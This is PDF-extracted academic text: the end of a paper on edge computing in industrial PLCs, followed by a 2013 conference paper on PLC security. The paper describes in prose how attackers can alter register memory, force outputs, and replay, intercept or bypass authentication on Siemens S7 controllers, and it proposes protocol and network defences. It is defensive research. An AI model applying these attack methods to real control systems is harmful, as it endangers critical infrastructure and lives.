powerful capabilities, are bringing new computing power to the shop floor while maintaining real-time analysis. The devices act as a bridge between physical on-premise tier, populated with sensors and actuators, and higher tiers which Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:08 UTC from IEEE Xplore. Restrictions apply. consists of supervisory and business-oriented applications. With new computing capabilities, functionalities that are being performed on edge PLCs are improved. Applications from higher levels of industrial networks can be delegated to PLC making the industrial network more reliable in case of communication failure. REFERENCES [1] https://www.ibm.com/topics/industry-4-0 , Accessed: 30.12.2021. [2] S. Stankovski, G. Ostoji , M. Ni in, I. Baranovski, and L. Tarjan, Edge Computing for Fault Detection in Smart Systems , ICIST 2020 Proceedings, vol. 1, pp. 22-26. [3] https://www.bmbf.de/bmbf/de/forschung/digitale-wirts chaft-und- gesellschaft/industrie-4-0/industrie-4-0 , Accessed: 30.12.2021. [4] V. Alc cer and V. Cruz-Machado, Scanning the Industry 4.0: A Literature Review on Technologies for Manufacturing Systems , Engineering Science and Technology , vol. 22, no. 3, pp. 899-919, 2019 [5] C. Bai, P. Dallasega, G. Orzes and J. Sarkis, Industry 4.0 technologies assessment: A sustainability perspective , International Journal of Production Economics, vol. 229, 2020 [6] H. Boyes, B. Hallaq, J. Cunningham and T. Watson, The industrial internet of things (IIoT): An analysis framework , Computers in Industry , vol. 101, pp. 1-12, 2018 [7] Gesch ftsmodell-Innovation durch Industrie 4.0: Chancen und Risiken f r den Maschinen- und Anlagenbau , Munich and Stuttgart, 2015 [8] P. Garcia et. all, Edge-centric computing: vision and challenges ACM SIGCOMM Computer Community , vol. 45, no. 5, pp. 37 42, 2015 [9] S. Stankovski, G. Ostoji , M. aponji , M. Stanojevi and M. Babi , Using micro/mini PLC/PAC in the Edge Computing Architecture , 19th International Symposium Infoteh-Jahorina, March 2020. [10] S. Stankovski, G. Ostoji , I. Baranovski, M. Babi and M. Stanojevi , The impact of edge computing on industrial automation , 19th International Symposium Infoteh-Jahorina, March 2020. [11] W. Dai, H. Nishi, V. Vyatkin, V. Huang, Y. Shi and X. Guan, Industrial Edge Computing: Enabling Embedded Intelligence , IEEE Industrial Electronics Magazine, vol. 13, no. 4, pp. 48 56. [12] Z. K. Wazir, E. Ahmed, S. Hakak, I. Yaqoob and A. Ahmed, "Edge computing: A survey", Future Generation Computer Systems, vol. 97, pp. 219-235, 2019. [13] Y. Wu, H. -N. Dai and H. Wang, "Convergence of Blockchain and Edge Computing for Secure and Scalable IIoT Critical Infrastructures in Industry 4.0," IEEE Internet of Things Journal , vol. 8, no. 4, pp. 2300- 2317, 15 Feb.15, 2021. [14] K. A. Kumari EDGE COMPUTING Fundamentals, Advances and Applications , CRC Press, December 2021. [15] M. Chen, Y. Miao, H. Gharavi, L. Hu and I. Humar, Intelligent Traffic Adaptive Resource Allocation for Edge Computing-Based 5G Networks , IEEE Transactions on Cognitive Communications and Networking , vol. 6, no. 2, pp. 499-508, June 2020. [16] N. Hassan, K. A. Yau and C. Wu, "Edge Computing in 5G: A Review," IEEE Access, vol. 7, pp. 127276-127289, 2019. [17] S. Raza, S. Wang, M. Ahmed, M. R. Anwar, "A Survey on Vehicular Edge Computing: Architecture, Applications, Technical Issues, and Future Directions", Wireless Communications and Mobile Computing , vol. 2019, 19 pages, 2019. [18] Ch. Feng, Y. Wang, Q. Chen, Y. Ding, G. Strbac and C. Kang, "Smart grid encounters edge computing: opportunities and applications", Advances in Applied Energy , vol. 1, 2021. [19] McKinsey&Company, New demand, new markets: What edge computing means for hardware companies , High Tech Practise , October 2018. [20] B. Scholten, The Road to Integration: A Guide to Applying the ISA-95 Standard in Manufacturing , ISA, 2007 [21] Edge Computing Consotrium, Edge Computing Reference Architecture 2.0 , November 2017. [22] S. Trinks and C. Felden, Edge Computing architecture to support Real Time Analytic applications : A State-of-the-art within the application area of Smart Factory and Industry 4.0 , IEEE International Conference on Big Data , 2018. [23] FAR-EDGE Architecture and Components Specification, available on: https://ec.europa.eu/research/participants/documents /downloadPublic?do cumentIds=080166e5b3996c23&appId=PPGMS . Accessed: 30.12.2021. [24] I. Sitt n-Candanedo, R.S. Alonso, S. Rodr guez-Gonz lez, J.A. Garc a Coria, and F. De La Prieta, Edge Computing Architectures in Industry 4.0: A General Survey and Comparison , International Workshop on Soft Computing Models in Industrial and Environmental Applications pp. 121-131, 2018. [25] Control Edge, avaliabe on: https://www.honeywellprocess.com/library/marketing/t ech-specs/51-52- 03-31.pdf . Accessed: 30.12.2021. [26] Groov EPIC, avaliable on: https://documents.opto22.com/2267_groov_EPIC_Users_G uide.pdf . Accessed: 30.12.2021. [27] MI5000 , avaliable on: https://dl.mitsubishielectric.com/dl/fa/document/cat alog/melipc/l08578e ng/l08578engd.pdf . Accessed: 30.12.2021. [28] S. Stankovski, G. Ostoji , X. Zhang, I. Ze evi and M. Stanojevi , "Challenges with Edge Computing in Mechatronics Education," 2021 20th International Symposium INFOTEH-JAHORINA (INFOTEH) , 2021, pp. 1-4, doi: 10.1109/INFOTEH51037.2021.9400664. [29] S. Sarang, G. Stojanovi , S. Stankovski, and V. Jeoti, An Overview of Statistical Prediction Models for Solar Energy Harvesting Wireless Sensor Networks , Journal of Mechatronics, Automation and Identification Technolog y, vol. 6, no. 4. pp. 1-5, 2021. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:08 UTC from IEEE Xplore. Restrictions apply.
PLC_security_and_critical_infrastructure_protection.pdf
Programmable Logic Controllers (PLCs) are the most important components embedded in Industrial Control Systems (ICSs). ICSs have achieved highest standards in terms of ef ciency and performance. As a result of that, higher portion of infrastructure in industries has been automated for the comfort of human beings. Therefore, protection of such systems is crucial. It is important to investigate the vulnerabilities of ICSs in order to solve the threats and attacks against critical infrastructure to protect human lives and assets. PLC is the basic building block of an ICS. If PLCs are exploited, overall system will be exposed to the threat. Many believed that PLCs are secured devices due to its isolation from the external networks of the system. The attacks such as Stuxnet have proven the incorrectness of such thoughts. In this paper we have revealed the vulnerabilities of PLCs through a variety of attack vectors which could affect the related critical infrastructure. Furthermore, we have proposed solutions for such weaknesses in PLC based systems.
PLC Security and Critical Infrastructure Protection G. P. H. Sandaruwan, P. S. Ranaweera, and Vladimir A. Oleshchuk Keywords: PLC vulnerabilities, PLC security, critical infrastructure protection I. I NTRODUCTION Industrial automation is one of the most popular terms that have been discussed over the past decade. Automation is an important aspect when it comes to industrialization. Goal of automation is to minimize the human involvement by both physically and mentally. Most of the critical infrastructure in the world has been automated by means of electronic devices and systems. Most common examples are elevators, escalators and trains. Industrial infrastructure is heavily dependent upon auto- mated control systems. ICSs consist of Supervisory Control and Data Acquisition (SCADA) systems, Distributed Control Systems (DCSs) and Programmable Logic Controllers (PLCs). The main functions of such ICS is to sense (collect data), monitor, manage and perform actions (decision making based on gathered data). A higher portion of an ICS includes hardware devices. But most important part is a computer driven system, which pro- vides an interface to humans who are monitoring the system. Remote or distributed devices such as PLCs are operating under the commands of computers. These commands could be pre-programmed (automated) or manually overridden by people. A computer or a data system could be easily attacked by means of computer viruses. If a virus could attack a computer and affect its programs, an ICS would be vulnerable. Even though the manual override option is available, damage done might be unrecoverable by the time it is activated. Therefore, nding out such vulnerabilities and implementing solutions is vital. G. P. H. Sandaruwan, P. S. Ranaweera and Vladimir A. Oleshchuk are with the Dept. of Information and Communication Technology, University of Agder (UiA), N-4898 Grimstad, Norway.The rest of this paper is organized as follows. Background is explained in Sec. II and then the Related Work is given in Sec. III whereas possible attack vectors on PLC based systems are introduced in Sec. IV . Furthermore, countermeasures for securing PLC based systems are given in Sec.V before the paper is concluded in Sec. VI. II. B ACKGROUND Many believed that a plant control system is an isolated system with no outside world connection. Hence, a possibility of an infection is minimal. Usually computer viruses are ineffective with PLCs. But recent events suggest that SCADA systems are in a signi cant risk even though it is isolated from the plant s main network. In 2000, Queensland waste management plant was hacked by a former employee where large amount of sewage was dumped into public areas in the city. This happened in Aus- tralia only using a laptop and a wireless radio. There was a malfunction in two important monitoring systems in the Ohio Davis-Besse nuclear plant due to a worm been penetrated to computers in 2003 [1]. This kind of malfunction could lead into loss of civilian lives as well. Incidents occurred in 1999 and 1992 at Bellingham and Bernham, Texas respectively caused three deaths and large damage to the infrastructure due to a Gas distribution system malfunction. There were two metro trains collided in 2009 which resulted in deaths and injuries to the passengers [1]. Even though such incidents occurred, there was not any enthusiasm among the scienti c community to explore the security concerns in PLC related automated systems until the recent past. After the discovery of Stuxnet malware in 2010, there was a special eagerness among PLC producers as well as users for determining associated security vulnerabilities in PLC based systems. In other words, Stuxnet opened up a way of redesigning secured PLC architectures. PLC producers such as Hitachi, Mitsubishi, Panasonic, Samsung and Siemens have been working with antivirus producers such as Kaspersky and Symantec to determine solutions for such vulnerabilities and inef ciencies in PLC systems throughout recent years. III. R ELATED WORK Malware poses a signi cant threat to the industrial control systems. Fovino et al. [2] have presented the impact of traditional malware on SCADA systems while enhancing their potential damaging effects. A research carried out by Creery, et al. [3] have put forward a high level analysis regarding possible threats to power plant based control systems. Stuxnet can be regarded as a malware which is known to be discovered in 2010, that affects the normal functionality of industrial control systems having PLCs through PLC Rootkit 2013 IEEE 8th International Conference on Industrial and Information Systems, ICIIS 2013, Aug. 18-20, 2013, Sri Lanka 81 978-1-4799-0910-0/13/$31.00 2013 IEEE Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:20 UTC from IEEE Xplore. Restrictions apply. [4]. A research carried out by R. Masood et al. [5] showed the impact of stuxnet worm on PLC systems by using a pressure sensor as PLC and how pressure value drops to an unacceptable value by changing Keil code of design. According to E. Byres [6] one of the main exploitable weaknesses in industrial control systems are vulnerabilities in the communication protocols and their implementations. In order to nd the shortcomings of the communication protocols, the Group for Advanced Information Technology (GAIT) and Cisco Systems took the initiative in investigating probable vulnerabilities in SCADA protocols MODBUS and MODBUS/TCP [6]. In the quest of nding solutions to malware attacks, analysis of malware is very crucial. In regard to analyzing malware, a limited number of tools are available mainly for analyzing the latest generation of malicious software [7]. CWSandbox [8] is one such tool which is capable of monitoring malware actions on execution. In related to worm simulation, D. Ellis [9] presented a method based on mathematical propagation models using classical epidemiology whereas Liljenstam, et al. [10] proposed a method based on single node worm simulations. According to M. Hentea in order to manage risks, it is important to identify causes of vulnerabilities and establishing vulnerability management life cycle that provides design and technologies required to nd and remediate weaknesses before they are being exploited [11]. A research carried out by Patel, et al. expressed methods for SCADA security risk analysis by combining the concepts vulnerability tree analysis, fault tree analysis and attack tree analysis [12]. IV. PLC V ULNERABILITY ANALYSIS PLCs have been used in industrial control systems for more than four decades, though the impetus on cyber attacks on PLC came in to the picture very recently. PLCs can be considered as PCs, so they are vulnerable to same type of attacks as traditional IT systems [13][14] while operation of the attacks may differ since their target is to deviate the operation of the physical process under the control of PLCs from its safety margins. ICSs use a variety of different protocols to communicate with eld devices such as sensors, actuators as well as for programming and communicating with PLCs in the process network. MODBUS, Ethernet/IP, DNP 317 and ISO-TSAP are among the most commonly used protocols. Though these protocols work ef ciently in communication, they were not de- signed to provide security since security in industrial systems was not a concern when the protocols were rst introduced. So, these protocols do not provide con dentiality, authentication or data integrity while in operation, which makes them vulnerable against a variety of attacks. A. By-pass Logic Attack PLC generally contains two Random Access Memory (RAM) areas known as main memory and register memory. Furthermore, the main memory is used for storing currently executing program logic whereas the register memory is usedas a temporary memory by the currently executing logic [1]. Though register memory is a temporary one, since it is being used by the executing logic it is bound to contain some important variables that would affect the main logic. Generally, industrial plants allow the register memory to be accessed by other PCs across the PLC network along with read and write operations. Moreover, assume that an attacker can gain access to one of the machines in the PLC network and infect that machine with a worm which is capable of writing arbitrary values to the register memory. Since the register memory values changed arbitrarily, it can change the pressure value. Thereafter, exe- cuting logic will set a new value based on the change and that may cause the system to exceed its safety margins and probably driven to a collapse. B. Brute-Force Output Attack The general functionality of a PLC is to make some decision based on the inputs and states and then use that decision to do some change in the electrical output in order to alter a certain physical process. Typically in industrial SCADA networks, most of the PLCs do contain a special functionality called as forcing outputs, which allows a PLC operator to remotely change the output forcefully. This can be achieved by directly connecting to the PLC, through a network or Internet [1]. This process does not require any authentication mechanism, meaning that anyone who has the access can force outputs. Outputs of a PLC may affect physical processes such as governing a speed of a motor or control some valves, switches, etc, which suggests that consequences will be awful if an attacker got the opportunity to exploit it. This attack looks more lethal since the intruder does not need any high level knowledge about logic, only requires the access. C. Exploits on Siemens Simatic S7 PLCs This section emphasizes some attacks that can be imple- mented on Siemens PLCs. PLCs use PROFINET eldbus standard, which is based on Ethernet to create a workable environment for networking protocols and industrial automa- tion. Siemens PLCs use a software called as Simatic TIA and step 7 Engineering software to program the PLCs and the communication between the software and the PLCs is based on International Standards Organization Transport Service Access Point (ISO-TSAP) protocol. This protocol also does not provide any encryption for the data that are exchanged with the PLC, meaning that all data are sent as plaintext. Vulnerabilities discussed below exploits this weakness of the ISO-TSAP protocol. 1) Replay Attack: The general idea of a replay attack is that an attacker intercepts some information or data and uses those data to compromise the system in a later time. Before getting to terms with the replay attack, a simple experiment can be done which gives us some idea about the informa- tion exchanged between the PLC and Step 7 programming software. Let us assume that we have connected a PLC to a 2013 IEEE 8th International Conference on Industrial and Information Systems, ICIIS 2013, Aug. 18-20, 2013, Sri Lanka 82 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:20 UTC from IEEE Xplore. Restrictions apply. test network and run the Step 7 software on the programming PC. In order to analyze the packet ow between the PLC and the software, it is possible to use a packet analyzing software such as wireshark purely because ISO-TSAP protocol which is used for communication is based on Transmission Control Protocol (TCP). After establishing the connection, we can send a CPU STOP command to the PLC and start capturing packets through wireshark. After PLC s CPU has stopped, we can have a look at what sort of information has been exchanged during command execution by analyzing captured packets. Fig. 1 show a TCP stream captured during the execution of CPU STOP command [13]. Fig. 1. Captured TCP stream during a CPU STOP command [13] In Fig. 1, information highlighted in blue which is actually the data sent from PLC to the step 7 Engineering software. It includes some valuable facts about the PLC, such as its type, model number, etc. On the other hand, raw data represented in red color gives some indication about the client side information. This information itself could be very important to an attacker, since this will help an attacker to speci cally build some sort of a malware that could attack a PLC in the system at a later time. Since the above information is revealed through CPU STOP command, this is known as CPU Start- Stop Attack. If the attacker is knowledgeable about the communication between the PLC and the Engineering software, he can capture more information on the PLC as well as its logic and even about the underlying physical process. We earlier showed that interception of packets during a single command could reveal so much of valuable data, so it is obvious that listening to a full communication session will provide much more to an attacker. So, attacker has the capability to reuse the gathered data while manipulating them to his liking as well as adding some malicious codes through a replay attack in order to compromise the PLC. Since all intercepted data is not encrypted, attacker can make the replay attack worse than it looks especially comparing with the replay attacks on normal IT based networks. 2) Man in the Middle (MIM) Attack: Another signi cant vulnerability with ISO-TSAP protocol is that an attacker has the capability to act as a Man in the Middle between communication of the PLC and Step 7 software by taking advantage of authentication less nature of the protocol. So, attacker can gather all data transmitted from software to the PLC and vice versa without being noticed at the two ends. The information that could reveal through MIM may also help an attacker to ef ciently probe an attack on the process beingcontrolled by the PLC. 3) S7 Authentication Bypass Attack: In some cases PLCs can be protected through passwords though it is actually not very popular in industrial automation purely because they did not believe it is possible to mount attacks against PLCs, since the eld network is generally isolated. Even though a PLC is protected through passwords, attacker has the ability of bypassing the authentication due to the lack of security of the protocol. We can explain this scenario as follows. If a proper user needs authenticate himself to the PLC, he will send an authentication packet which contains the hash of the PLC s password. After reception of the packet, PLC can verify the user by comparing its hash value of the password and the received one. If these two are matching, then the user will be authenticated to the PLC providing access to the system. If we consider from the attacker s perspective; if he can grab an authentication packet from a valid user, attacker can replay that packet at a later time to authenticate himself to the PLC. Otherwise he can use a password dictionary with commonly used passwords and hash them to nd a match with the intercepted hash from the user to decrypt the hash and to discover the plaintext password. This will allow the attacker to generate his own authentication packets as well. So this suggests that protecting Siemens PLCs through passwords actually does not achieve its ultimate goal. V. S ECURING PLC S YSTEMS When industrial systems rst deployed, no one believed it is possible to insert a malicious agent in to the system and make the system vulnerable. So, most of the protocols and standards that govern communication inside the system were mainly developed based on this presumption, which has now proved to be wrong. The following are some countermeasures that can be adopted to secure critical infrastructure in industrial systems. A. Protocol Modi cation to Enhance Security The main reason for the vulnerability of PLC based in- dustrial systems is actually due to the aws of the protocols such as DNP3, Modbus and Pro bus that are used for the communication between PLCs and process network machines (MTUs). The inability of these protocols to provide authentica- tion, con dentiality and integrity makes the system exploitable in many ways. Since some of these exploitations do not require a high-level cryptanalytic knowledge makes the scenario far worse. In this section we have discussed a method to secure an existing protocol by introducing some modi cations to Modbus protocol. We will see how we can modify the struc- ture of the protocol, in order to provide data integrity and authentication between nodes of a process network. Fig. 2 illustrates a modi ed Modbus data unit which can ful l our security requirements. 1) Achieving Data Integrity: In order to achieve data in- tegrity, data unit is transmitted along with a Secure Hash Algorithm 2 (SHA2) digest of the data unit. At the reception of data by a device in the process network, it will recalculate the 2013 IEEE 8th International Conference on Industrial and Information Systems, ICIIS 2013, Aug. 18-20, 2013, Sri Lanka 83 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:20 UTC from IEEE Xplore. Restrictions apply. Fig. 2. Secure Modbus Application Data Unit digest from data and check with the digest sent by the source. So, the data unit will only be accepted if the computed digest is matching with the one that is sent by the source device. This suggests that if the data is altered during transmission, new SHA2 digest will differ from the precompiled digest at the source which will allow the destination to detect the alteration of data. 2) Establishing Authentication: It is possible to establish authentication among the end devices of a process network by managing a pair of private and public keys by each of the device. The private key is only known to the device that owns the key whereas the public key is known to all the devices in the network. Consider a case where master device sending a control signal to a slave in the process network. So, the master will generate the relevant data and compute a SHA2 digest and sign it with its private key before sending it to the corresponding slave device. Since, private key is only known to a speci c device, slave device will get the opportunity to authenticate the master by decrypting the signed digest through the master s public key and verifying the digest. 3) Protection against Replay Attacks: In order to prevent replay attacks, there must be some way to distinguish a packet originated just now and a packet that was captured earlier and injected later into the network. This can be achieved by introducing a Timestamp (TS) into the data unit. Since there is a nite time delay between sending and reception of packets as well as devices may not be properly synchronized, the receiver has to use a speci c timing window to decide whether to accept or drop the packet. If the packet arrived to the destination within the speci ed timing window of the receiver, it will be accepted and if not the packet will be discarded. Furthermore, timing window must be large enough to make sure that it will not drop proper packets and at the same time it must be small enough to prevent an attacker from using the timing window for a replay attack. So, it is vital to choose an appropriate timing window. B. Protection via Special Filtering Units Consider a scenario where an attacker succeeds in compro- mising a MTU of the process network. So, the attacker may able to capture the private key of the compromised device and use that to sign a malicious packet which will ultimately looks like a valid packet at the destination since it is signed correctly. As a result, the authentication mechanism may not provide the intended results when a master device is compromised. This issue can be solved by introducing a set of ltering units in between MTUs and eld devices of the process network. We can divide these ltering units into two main categories according to their functionality. They are Signature based lters and Critical state detection lters. Signature based lters use a predetermined set of known attack patterns (sig- natures) and it checks for any signature in the packets that are passing through the lter. Critical state refers to an unwanted state of an industrial process which can lead to a system failure or else affect the safety limits of the process. Typically such states are very common in any industrial system. So, the task of critical state lters is to determine whether any packet passing through, can possibly lead to a critical state by examining the content of the packets. C. Intrusion Detection Systems An attacker seeks access to the SCADA network via several ways. He will select the most vulnerable location in the network. It can be either a host or a high level device. Once infected, that intrusion should be detected. In order to detect them, an Intrusion Detection System (IDS) could be used. An IDS is a set of tools and processes providing network monitoring which gives network administrator the opportunity of analyzing the network traf c. Hence network administrator is capable of detecting any unauthorized or unusual activity present within the network. IDS are usually deployed at an ingress or egress point of the network. Connectivity point of critical network devices is another location to deploy an IDS. It is capable of monitoring the network traf c without impacting it. There are two types of detection systems used in IDSs. They are Signature based IDS and Statistical anomaly based IDS. In signature based systems, IDS compare the collected traf c data with pre-de ned set of rules or signatures . Every malicious process has its own signature. Once determined an IDS could detect and wipe it off from the network. Because of its easy implementation, signature based systems are more popular among vendor community. In order for this method to succeed, signatures of every malware produced should be included in the IDS. But achieving this is impractical. In order to identify Stuxnet malware, it took more than a year. Yet the origin is unknown. Therefore, signature based IDSs do not provide protection, especially against new malwares where the signatures are unknown in order to be programmed to an IDS. Anomaly based IDS can detect any sort of abnormal process occurring inside the network. This is achieved by comparing number of traf c parameters from their normal values. Port numbers, data payloads, bandwidth and protocols are such parameters. Once an anomaly is detected, the IDS will alert the system administrator and rewall and send information about the anomaly. Therefore, administrator has the capability to prevent malware attacks. This method of intrusion detection is effective against all the malwares produced to the current date. An IDS also includes an Intrusion Prevention System (IPS). Function of IPS is to reset the connection and re-program the rewall so that, network will block the traf c corresponding to malicious process. This could be considered as another appli- cation layer rewall. A system which includes both detection and prevention is called an Intrusion Detection and Prevention (IDP) system. Even though such systems are installed in a SCADA system, it should be properly updated, monitored and 2013 IEEE 8th International Conference on Industrial and Information Systems, ICIIS 2013, Aug. 18-20, 2013, Sri Lanka 84 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:20 UTC from IEEE Xplore. Restrictions apply. validated. Otherwise it will not be effective against the most current malicious processes. D. Creating Demilitarized Zones (DMZ) DMZs are logical sub-networks inside a large network which separates the un-trusted segment (Internet) of the net- work from the main network. This process will allow the network administrator to deploy an additional layer of security. An attacker will have access to the un-trusted part of the network only. In this, the whole network is segmented into multiple zones (External, Corporate, Data, Control and Safety) and each zone is rewall protected. This will prevent a threat been propagated to whole network once it infects one partition of the network. Multiple DMZs are proved to be effective against large network architectures. E. Best Practices for Securing PLC Systems There are several best practices that could aid in preventing harmful security attacks to PLC systems. A strong user ac- count management policy should be used. Passwords should be applied for every possible position. Strong passwords should be used. All unused accounts along with default accounts should be disabled. Process network and the Internet should not be connected directly and PLC programming machines and the PLCs must only be connected when they are programmed. Accessing control network through intranet should be controlled and monitored. Remote controlling of devices and maintenance activities should follow a secure methodology that minimizes the possibility of an infection. The usage of external drivers such as USBs should be limited among the users in order to prevent an infection. VI. C ONCLUSIONS In this paper we have focused on revealing the vulnerabili- ties of PLC based SCADA systems and how those vulnerabil- ities would affect the critical infrastructure of common world applications. PLCs have been used as the low level controlling devices in large ICSs. There were attempts by attackers to take control of such PLC based systems after they were introduced. An attacker should infect the corresponding computer which governs the PLC in order to control it. Therefore the security of governing computers in a PLC based system is vital. Vulnerabilities of the process network are similar to an ICT network except for the fact that, they are isolated from the outside network. An infection could occur either by USB drives or Intranet. Securing the system from such exposing points of the network could grant overall protection to the system. In order to protect a PLC system, several methods can be adopted. The most vulnerable area in PLC systems is the lack of security in communication protocols. So enhancing security of such protocols is quite important. Other than that, ltering methods, rewalls, IDSs and DMZs could be introduced into the system to strengthen the overall security.Adopting all these methods at the same time is impractical. It will degrade the performance of the overall system as well as adaptation would not be economically bene cial. An effective combination of such methods should be considered depending upon the vulnerabilities and the architecture (which varies according to the vendor) of the system which needs to be protected. The existing security policies do not provide a complete protection for a PLC system. The deployment of rewalls would not be suf cient to stop the infections. A complex worm like stuxnet could easily bypass the rewall without a trace. An IDS should be deployed along with a rewall in order to prevent the access of infections. Filtering methods would allow detecting state changes and signatures. Designing the network could be done according to DMZs. Future of PLC systems looks bright due to the attention given by scienti c community over the last few years. PLC designers and programmers should be focused on security aspects under the supervision of security experts. Ways of nding better solutions which do not degrade the performance excessively as well as providing an adequate security is an interesting area to be discussed in the future. REFERENCES [1] R. Johnson, Survey of scada security challenges and potential attack vectors , in Proceedings of International Conference for Internet Tech- nology and Secured Transactions (ICITST) ,IEEE, London, UK, Nov. 2010. [2] I. N. Fovino, A. Carcano, M. Masera, and A. Trombetta, An experimen- tal investigation of malware attacks on scada systems , in International Journal of Critical Infrastructure Protection, IEEE, vol. 2, no. 4, pp. 139-145, 2009. [3] A.Creery and E.Byres, Industrial cyber security for a power system and scada networks - be secure , in Industry Applications, IEEE, vol. 13, no. 4, pp. 39-55, 2007. [4] N.Falliere, L.Murchu, and E.Chien, W32.stuxnet dossier , Industry Applications, IEEE, vol. 1.4, 2011. [5] R. Masood, U. U. Ghazia, and Z. Anwar, Swam: Stuxnet worm analysis in metasploit, in Proceedings of Frontiers of Information Technology (FIT), IEEE, Islamabad, Pakistan, Dec. 2011. [6] E. Byres, D. Hoffman, and N. Kube, A study of security vulnerabilities in control protocols, 2006. [7] I. N. Fovino, A. Carcano, M. Masera, and A. Trombetta, An experimen- tal investigation of malware attacks on scada systems , in International Journal of Critical Infrastructure Protection, vol. 2, no. 4, pp. 139-145, 2009. [8] C. Willems, T. Holz, and F. Freiling, Toward automated dynamic malware analysis using cwsandbox , in Security Privacy, IEEE, vol. 5, no. 2, pp. 32-39, mar.-apr. 2007. [9] D. Ellis, Worm anatomy and model , in Proceedings of the workshop on Rapid malcode, ACM, Washington DC, USA, Oct. 2003. [10] M. Liljenstam, D. M. Nicol, V . H. Berk, and R. S. Gray, Simulating realistic network worm traf c for worm warning system design and testing , in Proceedings of the workshop on Rapid malcode , ACM, Washington DC, USA, Oct. 2003. [11] M.Hentea, security for scada control systems , in Journal of Informa- tion, Knowledge, and Management, vol. 3, 2008. [12] S. C. Patel, J. H. Graham, and P. A. Ralston, Security enhancement for scada communication protocols using augmented vulnerability trees , in CAINE, ISCA. [13] S. McLaughlin, On dynamic malware payloads aimed at programmable logic controllers , in proceedings of 6thWorkshop on Hot Topics in Security, USENIX, San Fransisco, USA, Aug. 2011. [14] A. A. Cardenas, S. Amin, and S. Sastry, Research challenges for the security of control systems , in Proceedings of the 3rdconference on Hot topics in security (HOTSEC), USENIX, San Jose, USA, Aug. 2008. 2013 IEEE 8th International Conference on Industrial and Information Systems, ICIIS 2013, Aug. 18-20, 2013, Sri Lanka 85 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:20 UTC from IEEE Xplore. Restrictions apply.